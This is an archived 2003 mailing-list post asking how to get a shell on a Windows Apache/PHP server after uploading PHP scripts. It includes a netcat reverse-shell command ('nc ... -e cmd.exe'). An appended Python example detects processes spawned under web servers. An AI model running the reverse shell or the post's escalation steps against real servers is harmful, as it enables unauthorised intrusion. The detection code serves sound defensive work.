Hi,

I am testing a Windows-based Apache server that's got PHP and MySQL installed on it. I found a PHP script that allows uploading other PHP scripts. The upload directory is also readable and executable. So I have uploaded some of my own scripts and can execute any command I want using `cmd /c command.exe`.

I am looking for ways to further exploit this server. The file system is probably "everyone full control". Have not tested that yet.

What I tried to do was use netcat to send a command shell to my own machine (cmd /c nc 333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the webserver contacts my own machine on port 333; however, I do not get a command prompt like the one I get when running the same netcat command from the command prompt of a Windows machine. Anyone know why?

If anyone knows an alternative to get a shell on the server, I would also appreciate it. Of course I can run any command through PHP, but there should be alternatives...

An alternative to my netcat idea is also appreciated }-)

maarten
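For defenders, the activity described in the post above (a PHP script under Apache launching `cmd /c` and further child processes) shows up as a process tree rooted at the web server. The following is an added example, not part of the original post: it walks process-creation records and flags everything spawned beneath a web server or PHP worker. The field names are modeled on Sysmon process-creation events, and the image list, paths and PIDs are assumptions constructed for the sample.

```python
import ntpath

# Assumption: image names a Windows Apache/PHP stack runs as.
WEB_IMAGES = {"httpd.exe", "apache.exe", "php.exe", "php-cgi.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}


def find_web_spawned(events):
    """Flag every non-web process descended from a web server or PHP worker.

    events: process-creation records in time order. PID reuse is ignored.
    """
    web = {}      # pid -> image name of a web server / PHP process
    tainted = {}  # pid -> lineage of a process spawned beneath one
    alerts = []
    for ev in events:
        name = ntpath.basename(ev["Image"]).lower()
        pid, ppid = ev["ProcessId"], ev["ParentProcessId"]
        if ppid in tainted:
            lineage = tainted[ppid] + " > " + name
        elif name in WEB_IMAGES:
            web[pid] = name   # the server itself or one of its workers
            continue
        elif ppid in web:
            lineage = web[ppid] + " > " + name
        else:
            continue          # unrelated process tree
        tainted[pid] = lineage
        alerts.append({"pid": pid, "lineage": lineage,
                       "shell": name in SHELL_IMAGES,
                       "command_line": ev["CommandLine"]})
    return alerts


def _ev(pid, ppid, image, cmdline):
    return {"ProcessId": pid, "ParentProcessId": ppid,
            "Image": image, "CommandLine": cmdline}


# Constructed sample events (paths and PIDs are made up).
SAMPLE_EVENTS = [
    _ev(1000, 500, r"C:\Apache\bin\httpd.exe", "httpd.exe"),
    _ev(1004, 1000, r"C:\Apache\bin\httpd.exe", "httpd.exe"),
    _ev(2200, 1004, r"C:\Windows\System32\cmd.exe", "cmd /c command.exe"),
    _ev(2204, 2200, r"C:\Apache\htdocs\upload\command.exe", "command.exe"),
    _ev(4000, 300, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for alert in find_web_spawned(SAMPLE_EVENTS):
        print(alert)
```

Tracking lineage rather than only the direct parent matters here: the second alert's parent is `cmd.exe`, so a rule that only checks for a web server parent would miss it, while the administrator's interactive `cmd.exe` (PID 4000) is correctly left alone.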
This archive was generated by hypermail 2b30 : Wed Feb 19 2003 - 13:44:49 PST